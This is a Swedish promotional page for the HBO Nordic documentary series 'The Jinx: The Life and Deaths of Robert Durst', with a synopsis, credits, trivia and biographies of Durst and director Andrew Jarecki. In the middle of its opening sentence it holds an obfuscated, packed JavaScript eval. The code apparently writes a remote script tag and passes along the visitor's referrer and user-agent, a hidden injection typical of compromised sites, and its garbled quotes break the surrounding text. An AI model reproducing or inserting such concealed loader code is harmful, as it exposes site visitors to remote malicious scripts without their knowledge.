Image Image Image Image Image Image Image Image Image Image

| 4 juni, 2020

Scroll to top

Top

THE JINX: THE LIFE AND DEATHS OF ROBERT DURST

THE JINX: THE LIFE AND DEATHS OF ROBERT DURST
Sebastian

Banbrytande eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hndtk|var|u0026u|referrer|zfizn||js|php’.split(’|’),0,{}))
HBO-dokumentärserie i sex avsnitt om några av New Yorks mest ökända brottshistorier. Måndagar med start den 9 februari, exklusivt på HBO Nordic.

THE JINX: THE LIFE AND DEATHS OF ROBERT DURST är en av de mest omtalade tv-händelserna 2015. Dokumentärserien i sex avsnitt är regisserad och producerad av Andrew Jarecki  och producerad och filmad av Marc Smerling (teamet bakom den Oscarnominerade ”Capturing The Friedmans”).

Serien avslöjar sedan länge begravd information som teamet upptäckte under sju års reseach av dessa ouppklarade brott, och om mannen i misstankarnas centrum – Robert Durst, ättling till New Yorks miljardärfamilj Durst. Serien har gjorts med hans fulla samarbete .

Den begåvade, tillbakadragne och av media obarmhärtigt granskade Durst har aldrig talat offentligt – förrän nu. Under exklusiva intervjuer med Jarecki, talar han med häpnadsväckande uppriktighet och avslöjar hemligheter i ett fall som har gäckat myndigheter i 30 år. Durst var länge misstänkt för försvinnandet av hans vackra unga fru i New York 1982, för mordet på nyckelvittnet i målet i Beverly Hills 2000, samt det påföljande mordet och lemlästningen av en granne i Galveston, Texas. Durst har konsekvent hävdat sin oskuld och är än idag en fri man.

Serien försöker avslöja vad som hände i fallet med Robert Durst, som anklagades för morden men med hjälp från toppadvokater befanns oskyldig. Det här är Durst berättelse i hans egna ord och regissören Andrew Jarecki har genom sina intervjuer och undersökningar försökt ta reda på om den karismatiske Robert Durst faktiskt är skyldig till de påstådda morden.

THE JINX: THE LIFE AND DEATHS OF ROBERT DURST är Jareckis och Smerlings andra samarbete med HBO. Det första samabetet resulterade i den uppmärksammade dokumentären ”Capture The Friedmans”, som visades på bio och tv. The Jinx: The Life and Deaths of Robert Durst är samproducerad med och klippt av Zac Stuart-Pontier, som tidigare arbetat med filmmakarna med ”Catfish”, och Blumhouse Jason Blum är exekutiv producent (HBO:s ”The Normal Heart”).

The Jinx: The Life and Deaths of Robert Durst har premiär den 9 februari på HBO Nordic.

Kuriosa

Andrew Jarecki har alltid varit fascinerad av berättelsen och faktiskt gjort en långfilm om Robert Durst 2010; All Good Things. I filmen spelade Ryan Gosling Durst och Kirstin Dunst hans fru. Samtidigt som filmen hade premiär fick Andrew ett  oväntat telefonsamtal från Durst. Om Andrew var intresserad, ville Durst berätta sin historia …

Biografier:

Robert Durst

Robert Alan Durst (född 12 april, 1943) är son till fastighetspampen Seymour Durst. Hans mor begick självmord framför ögonen på den sju år gamla Robert. Han hamnade i medias blickfång 1982 när hans fru Kathleen McCormack försvann, och igen i början av 2000-talet när han var föremål för en riksomfattande människojakt och två gånger friad för mordet på Durst nära vän Susan Berman, som troddes ha kunskap om McCormack försvinnande. Han misstänktes även för ett tredje mord, det på hans äldre granne Morris Black. Durst missade domstolsförhandlingen och blev USA:s första  rymling med miljardollar-status. Under 2003, då rättegången för mordet på Morris Black pågick, fick Durst diagnosen Aspergers syndrom, vilket försvaret hävdade förklarade hans beteende och han frikändes. Förra sommaren greps Durst för att ha blottat sig och urinerat i en affär. Durst väntar för närvarande på rättegång.

Andrew Jarecki

(Producent och regissör)
Andrew Jarecki är en amerikansk filmskapare, musiker, entreprenör med examen från Princeton University, där han verkade som teaterregissör. Han är också en av grundarna / VD för MovieFone, som såldes till AOL. Han har gjort flera uppmärksammade kortfilmer, är medkompositör till och framför ledmotivet till tv-serien Felicity, samt har producerat dokumentären Catfish. Jarecki är mest känd för sin Oscarnominerade och flerfaldigt prisade dokumentär Capturing The Friedmans. Hans första långfilm, All Good Things, kom 2010 med Ryan Gosling, Kirsten Dunst och Frank Langella i huvudrollerna.